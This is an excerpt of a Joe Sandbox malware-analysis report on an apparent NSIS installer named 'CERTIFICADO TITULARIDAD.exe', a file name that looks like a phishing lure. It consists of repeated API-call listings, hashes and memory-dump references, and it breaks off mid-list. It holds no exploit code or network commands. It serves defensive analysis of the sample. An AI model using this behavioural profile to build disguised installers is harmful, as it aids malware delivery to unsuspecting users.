                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2320649405-0
                                                                                                                          • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                                                          • Instruction ID: 524417ed32742d4b72cd17798d780815826fd18a7bcb7bb0f1ed1fdd1052d135
                                                                                                                          • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                                                          • Instruction Fuzzy Hash: B22135B1500705AFCB319F78DD08B577BF5AF81714B048A2DEA96A26E0D738D944CB54
                                                                                                                          APIs
                                                                                                                          • ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
                                                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1
                                                                                                                            • Part of subcall function 004060F2: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406108
                                                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                          • String ID: 9
                                                                                                                          • API String ID: 163830602-2366072709
                                                                                                                          • Opcode ID: 0fe20a848d4a285c173513a47146d0bdd1f0b43cc80ef0beb9e6d9777ffbd6ad
                                                                                                                          • Instruction ID: 4938fc2aff7960a3a7fedf371d3c64c497049ea43b58312dd80c80f6ae9549af
                                                                                                                          • Opcode Fuzzy Hash: 0fe20a848d4a285c173513a47146d0bdd1f0b43cc80ef0beb9e6d9777ffbd6ad
                                                                                                                          • Instruction Fuzzy Hash: 5051FB75D0421AABDF249FD4CA84AAEBB79FF04344F10817BE901B62D0D7B49D828B58
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E76
                                                                                                                          • GetMessagePos.USER32 ref: 00404E7E
                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00404E98
                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EAA
                                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404ED0
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                          • String ID: f
                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                          • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                          • Instruction ID: cfceae8db68972c520d490933057d7cb8d8acba3ea2256e028311c612775fba1
                                                                                                                          • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                          • Instruction Fuzzy Hash: A3015E7190021CBADB00DB94DD85BFFBBBCAF95B11F10412BBA51B61D0C7B49A418BA4
                                                                                                                          APIs
                                                                                                                          • GetDC.USER32(?), ref: 00401E56
                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                                                                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                                                                                                          • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                          • String ID: Tahoma
                                                                                                                          • API String ID: 3808545654-3580928618
                                                                                                                          • Opcode ID: 12fc5c0feb0b51e7a773ba9164babbc76b3b82788c0ea370a0f868ab0e4caa48
                                                                                                                          • Instruction ID: 1c21784e8a12ec6bf8935da156a17e2c336e66cb5fe6e154f3a2125ab74843e9
                                                                                                                          • Opcode Fuzzy Hash: 12fc5c0feb0b51e7a773ba9164babbc76b3b82788c0ea370a0f868ab0e4caa48
                                                                                                                          • Instruction Fuzzy Hash: 5A018871954240EFE7015BB4AE9ABDD3FB5AF15301F10497AF141B61E2C6B90445DB3C
                                                                                                                          APIs
                                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
                                                                                                                          • MulDiv.KERNEL32(0008EC4D,00000064,0008F588), ref: 00402FE1
                                                                                                                          • wsprintfW.USER32 ref: 00402FF1
                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00403001
                                                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013
                                                                                                                          Strings
                                                                                                                          • verifying installer: %d%%, xrefs: 00402FEB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                          • String ID: verifying installer: %d%%
                                                                                                                          • API String ID: 1451636040-82062127
                                                                                                                          • Opcode ID: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                                                                                          • Instruction ID: f83dc0eaaa7e9df2961e53678d13a3899a4bf5fcca0c0537cb294ee04905d4b1
                                                                                                                          • Opcode Fuzzy Hash: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                                                                                          • Instruction Fuzzy Hash: EF014F71640208BBEF209F60DD49FEE3B69AB44345F108039FA06A51D0DBB99A559F58
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 73F712BB: GlobalAlloc.KERNELBASE(00000040,?,73F712DB,?,73F7137F,00000019,73F711CA,-000000A0), ref: 73F712C5
                                                                                                                          • GlobalFree.KERNEL32(?), ref: 73F72743
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 73F72778
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2659336751.0000000073F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F70000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2659279507.0000000073F70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2659368168.0000000073F74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2659420622.0000000073F76000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_73f70000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1780285237-0
                                                                                                                          • Opcode ID: b6a88bfc15336dfc7129b9074bf4c942e40b784a7438dcf638156e0339a4b61f
                                                                                                                          • Instruction ID: 695f43baff3ad8fdae171bf3a5efbc6ad926ba9957d41177e474463814412472
                                                                                                                          • Opcode Fuzzy Hash: b6a88bfc15336dfc7129b9074bf4c942e40b784a7438dcf638156e0339a4b61f
                                                                                                                          • Instruction Fuzzy Hash: 4031CF7210410AEFD726AF55CED4FAE77FBFB853C07A4452AF10A83264C73168169B61
                                                                                                                          APIs
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00402A0B
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                                                                                                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2667972263-0
                                                                                                                          • Opcode ID: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                                                                                          • Instruction ID: 66908bbe9354c3b59104e874c770ae4161d9466efedc1f742b63756e9967f80f
                                                                                                                          • Opcode Fuzzy Hash: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                                                                                          • Instruction Fuzzy Hash: 54319E71900128ABCF21AFA5CE49D9E7E79AF44364F10423AF514762E1CB794C429FA8
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
                                                                                                                            • Part of subcall function 00405E9B: CharNextW.USER32(?,?,Forums.Mel,?,00405F0F,Forums.Mel,Forums.Mel, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe"), ref: 00405EA9
                                                                                                                            • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EAE
                                                                                                                            • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EC6
                                                                                                                          • lstrlenW.KERNEL32(Forums.Mel,00000000,Forums.Mel,Forums.Mel, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe"), ref: 00405F51
                                                                                                                          • GetFileAttributesW.KERNEL32(Forums.Mel,Forums.Mel,Forums.Mel,Forums.Mel,Forums.Mel,Forums.Mel,00000000,Forums.Mel,Forums.Mel, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 00405F61
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                          • String ID: 4#v$C:\Users\user\AppData\Local\Temp\$Forums.Mel
                                                                                                                          • API String ID: 3248276644-2338054733
                                                                                                                          • Opcode ID: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                                                                                                          • Instruction ID: 4f97f4adca9055af25af7ef058e1e83d315c20be799ec2f088cafe79a8eb74c9
                                                                                                                          • Opcode Fuzzy Hash: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                                                                                                          • Instruction Fuzzy Hash: DAF0F435115E5326D622323A2C49AAF1A05CEC2324B55453FF891B22C2DF3C89538DBE
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2659336751.0000000073F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F70000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2659279507.0000000073F70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2659368168.0000000073F74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2659420622.0000000073F76000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_73f70000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeGlobal
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2979337801-0
                                                                                                                          • Opcode ID: 2619021af61cfe111e4c4fe3739376beb17e1834aefc43719a55b4c0a8ce4b0e
                                                                                                                          • Instruction ID: 9e15ac82dc06c4f37bb84e44ebfde3a3e1e17b97de4e4979f5c769b3f03e706a
                                                                                                                          • Opcode Fuzzy Hash: 2619021af61cfe111e4c4fe3739376beb17e1834aefc43719a55b4c0a8ce4b0e
                                                                                                                          • Instruction Fuzzy Hash: E1510532D10D0AEBEB129FAC884879E77FAEB443C0FC4415BD406A3395E671A94D8791
                                                                                                                          APIs
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 73F725C2
                                                                                                                            • Part of subcall function 73F712CC: lstrcpynW.KERNEL32(00000000,?,73F7137F,00000019,73F711CA,-000000A0), ref: 73F712DC
                                                                                                                          • GlobalAlloc.KERNEL32(00000040), ref: 73F72548
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 73F72563
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2659336751.0000000073F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F70000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2659279507.0000000073F70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2659368168.0000000073F74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2659420622.0000000073F76000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_73f70000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4216380887-0
                                                                                                                          • Opcode ID: 748261fbdcec01991c0554c12f345e5314417aec935c38ccb9070bcba10b9a3f
                                                                                                                          • Instruction ID: 120513b0d51378790fcd52233228565b6ee1c81ed21506ab9e1b4b5353661179
                                                                                                                          • Opcode Fuzzy Hash: 748261fbdcec01991c0554c12f345e5314417aec935c38ccb9070bcba10b9a3f
                                                                                                                          • Instruction Fuzzy Hash: 0E41ADB240470AFFE724AF259C50F2A77F9FB443D0F90492FE54A86191EB30A584CB61
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00401D9F
                                                                                                                          • GetClientRect.USER32(?,?), ref: 00401DEA
                                                                                                                          • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                                                                                                          • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401E3E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2621096249.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1849352358-0
                                                                                                                          • Opcode ID: b4553b6f8f96a3615d4cb1d74016621c3cb3daa09826911c1e5c071ec9b0e61c
                                                                                                                          • Instruction ID: 002387d4b88dbb62f40c54eb0dee3f9a721ef30fc2dbb8ae50818b7fec09efb0
                                                                                                                          • Opcode Fuzzy Hash: b4553b6f8f96a3615d4cb1d74016621c3cb3daa09826911c1e5c071ec9b0e61c
                                                                                                                          • Instruction Fuzzy Hash: 0F21F872A00119AFCB15DF98DE45AEEBBB5EB08304F14003AF945F62A0D7789D41DB98
                                                                                                                          APIs
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,73F722D8,?,00000808), ref: 73F716D5
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,73F722D8,?,00000808), ref: 73F716DC
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,73F722D8,?,00000808), ref: 73F716F0
                                                                                                                          • GetProcAddress.KERNEL32(73F722D8,00000000), ref: 73F716F7
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 73F71700
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2659336751.0000000073F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F70000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2659279507.0000000073F70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2659368168.0000000073F74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2659420622.0000000073F76000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_73f70000_CERTIFICADO TITULARIDAD.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1148316912-0
                                                                                                                          • Opcode ID: 2f4cd347e2c84e4f8a232010a780f3af094209731d0dec3faa4b1b3807a6e2cd
                                                                                                                          • Instruction ID: f1cc99b75b2157d4aefbe3e08d41bae49b9187fe79b8e5d5027795f104c4c3fc
                                                                                                                          • Opcode Fuzzy Hash: 2f4cd347e2c84e4f8a232010a780f3af094209731d0dec3faa4b1b3807a6e2cd
                                                                                                                          • Instruction Fuzzy Hash: A9F01C732061387BD62036A79C4CDABBE9CEF8B2F5B210215F62D921A086614C01DBF1
                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DEE
                                                                                                                          • wsprintfW.USER32 ref: 00404DF7
                                                                                                                          • SetDlgItemTextW.USER32(?,00422F08), ref: 00404E0A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2620836156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2620814058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620855092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2620874523.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
